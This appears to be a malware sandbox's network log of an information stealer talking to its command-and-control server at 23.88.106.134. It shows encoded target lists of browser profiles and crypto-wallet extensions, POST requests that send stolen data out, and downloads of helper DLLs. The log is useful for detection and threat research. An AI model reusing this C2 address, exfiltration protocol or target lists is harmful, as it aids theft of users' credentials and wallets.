Jun 8, 2024 20:21:59.805840969 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:21:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
Jun 8, 2024 20:21:59.805902958 CEST	480	IN	Data Raw: 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 Data Ascii: cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFB
Jun 8, 2024 20:21:59.902142048 CEST	467	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE Host: 23.88.106.134 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="message"plugins------HCAFIJDGHCBFHJKFCGIE--
Jun 8, 2024 20:22:00.160151958 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
Jun 8, 2024 20:22:00.160202980 CEST	1236	IN	Data Raw: 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 Data Ascii: bWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWx
Jun 8, 2024 20:22:00.160242081 CEST	1236	IN	Data Raw: 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 6c 68 59 6d 46 6a 61 32 52 71 59 32 6c 76 62 6d 74 76 59 6d 64 73 62 57 52 6b 5a 6d 4a 6a 61 6d Data Ascii: YmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGN
Jun 8, 2024 20:22:00.160276890 CEST	1236	IN	Data Raw: 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 70 71 62 47 46 6b 61 57 35 75 59 32 74 6b 5a 32 Data Ascii: Z2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmp
Jun 8, 2024 20:22:00.160315990 CEST	668	IN	Data Raw: 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 52 35 66 47 70 6f 5a 6d 70 6d 59 32 78 6c 63 47 46 6a 62 32 78 6b 62 57 70 74 61 32 31 6b 62 47 Data Ascii: cGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJ
Jun 8, 2024 20:22:00.211610079 CEST	201	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID Host: 23.88.106.134 Content-Length: 6767 Connection: Keep-Alive Cache-Control: no-cache
Jun 8, 2024 20:22:00.211685896 CEST	6767	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jun 8, 2024 20:22:00.496449947 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:00.740082979 CEST	92	OUT	GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:00.995032072 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:00 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B
Jun 8, 2024 20:22:00.995050907 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 Data Ascii: @0B/70#N@B/81s:<R@B/92P @B
Jun 8, 2024 20:22:00.995066881 CEST	1236	IN	Data Raw: 0a 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 47 f7 0a 00 83 ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed Data Ascii: \|$D$4$Gtu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$r
Jun 8, 2024 20:22:00.995081902 CEST	636	IN	Data Raw: 66 eb 61 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 74 66 eb 61 31 c0 5d c3 55 89 e5 8b 45 08 85 c0 74 07 5d ff 25 78 66 eb 61 5d c3 55 b8 08 00 00 00 89 e5 5d c3 55 31 c0 89 e5 5d c3 55 89 e5 83 ec 18 89 04 24 ff 15 4c 66 eb 61 c9 c3 55 89 e5 Data Ascii: fa]UEt]%tfa1]UEt]%xfa]U]U1]U$LfaUMt$Lfa11UtBtRJ$~HD]UUtB]U1UtB]U1UtJtBB]JvYU@aS
Jun 8, 2024 20:22:00.995100021 CEST	1236	IN	Data Raw: 74 42 4f 8d 47 01 85 c0 7f 1e 31 c0 85 ff 78 34 0f b6 01 0f b6 12 0f b6 80 e0 a2 ec 61 0f b6 92 e0 a2 ec 61 29 d0 eb 1c 0f b6 01 84 c0 74 db 0f b6 32 8a 9e e0 a2 ec 61 38 98 e0 a2 ec 61 75 ca 41 42 eb be 5b 5e 5f 5d c3 55 31 d2 85 c0 89 e5 74 14 Data Ascii: tBOG1x4aa)t2a8auAB[^_]U1tta@1]UWVS4UUuEEEM)9}<u19E]Eatu;ur,-uu
Jun 8, 2024 20:22:02.197235107 CEST	201	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFB Host: 23.88.106.134 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Jun 8, 2024 20:22:02.474101067 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:02.609858990 CEST	201	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGID Host: 23.88.106.134 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Jun 8, 2024 20:22:02.876173019 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:02.894689083 CEST	559	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE Host: 23.88.106.134 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 42 46 42 46 48 4a 44 47 43 41 4b 45 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 [TRUNCATED] Data Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file"------EGIDBFBFHJDGCAKEGHJE--
Jun 8, 2024 20:22:03.153748035 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:03.496107101 CEST	559	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHD Host: 23.88.106.134 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 [TRUNCATED] Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
Jun 8, 2024 20:22:03.794855118 CEST	559	OUT	POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECAKKKKJDBKKFIEBKEHD Host: 23.88.106.134 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 4b 4b 4b 4a 44 42 4b 4b 46 49 45 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 [TRUNCATED] Data Ascii: ------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------ECAKKKKJDBKKFIEBKEHDContent-Disposition: form-data; name="file"------ECAKKKKJDBKKFIEBKEHD--
Jun 8, 2024 20:22:04.576541901 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 8, 2024 20:22:04.761312008 CEST	92	OUT	GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1 Host: 23.88.106.134 Cache-Control: no-cache
Jun 8, 2024 20:22:05.009850979 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:04 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 